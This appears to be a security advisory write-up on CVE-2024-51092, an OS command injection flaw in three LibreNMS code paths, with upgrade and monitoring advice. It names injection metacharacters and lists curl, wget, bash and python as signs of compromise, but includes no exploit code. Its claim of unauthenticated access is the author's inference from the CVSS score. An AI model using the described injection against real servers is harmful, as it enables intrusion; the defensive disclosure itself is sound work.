LibreNMS Pre-24.10.0 RCE via OS Command Injection (CVE-2024-51092)

Executive Summary

LibreNMS, an open-source network monitoring platform used by thousands of organizations, contains a critical OS command injection vulnerability tracked as CVE-2024-51092 with a CVSS score of 9.1. The flaw affects all versions before 24.10.0 and allows a remote, unauthenticated attacker to execute arbitrary operating system commands on the underlying server. The vulnerability resides in three separate code paths: AboutController.php's index() method, SettingsController.php's update() method, and PollDevice.php's initRrdDirectory() function. An advisory published by the LibreNMS maintainers on GitHub confirms the issue and provides patched code. No evidence of active exploitation in the wild has been reported as of this writing, but the ease of exploitation and the privileged position of LibreNMS servers on internal networks make this a high-priority patch target.

Technical Analysis

According to the GitHub security advisory, the injection occurs when user-supplied input is passed unsanitized to system-level command execution functions. The three affected endpoints each handle different functionality:

• AboutController.php (index()): This controller displays system information about the LibreNMS installation. It constructs a command string that includes user-controllable parameters, such as the version check or diagnostic data, without proper escaping. An attacker can inject shell metacharacters (e.g., ;, |, &&) to append arbitrary commands.

• SettingsController.php (update()): This endpoint processes configuration updates submitted by administrators. The advisory notes that the update() method writes to configuration files via shell commands that incorporate untrusted input. While this endpoint may require authentication in default configurations, the advisory does not explicitly restrict the attack surface to authenticated users, and the CVSS score of 9.1 (which typically assumes no privileges required) suggests the vector is exploitable without prior access.

• PollDevice.php (initRrdDirectory()): This function creates RRD (Round-Robin Database) directories for monitored devices. The directory path is derived from device hostnames or IP addresses, which can be spoofed or manipulated during device discovery. An attacker who can add a malicious device to the monitoring scope — or who can poison DNS entries resolved by the LibreNMS server — can trigger command execution when the poller attempts to initialize the RRD storage.

The advisory does not include proof-of-concept exploit code, but the nature of the injection (OS command injection in PHP applications) is well-understood. Attackers would likely chain this with network reconnaissance to locate LibreNMS instances, then use the shell access to pivot laterally, exfiltrate SNMP community strings, or deploy ransomware.

Mitigations & Recommendations

The only complete mitigation is to upgrade LibreNMS to version 24.10.0 or later. The maintainers released this version with input sanitization and command escaping fixes for all three vulnerable code paths. There is no reliable workaround — disabling the affected controllers would break core monitoring functionality. Defenders should:

1. Immediately upgrade all LibreNMS instances to 24.10.0 or newer. The upgrade process is documented in the project's official upgrade guide.
2. Audit network exposure of LibreNMS web interfaces. If the web UI must be accessible from the internet, place it behind a VPN or reverse proxy with strict access controls. The CVSS attack vector is "network" (AV:N), meaning remote exploitation is possible.
3. Monitor for anomalous command execution on LibreNMS servers. Look for unexpected processes spawned by the web server user (typically www-data or librenms), especially shell commands invoking curl, wget, bash, or python.
4. Review device discovery logs for suspicious hostnames or IPs that could trigger the PollDevice.php injection path. Restrict SNMP and ICMP discovery to trusted subnets.

No indicators of compromise (IOCs) have been published by the maintainers or by third-party researchers as of this report. The advisory does not mention any active exploitation campaigns.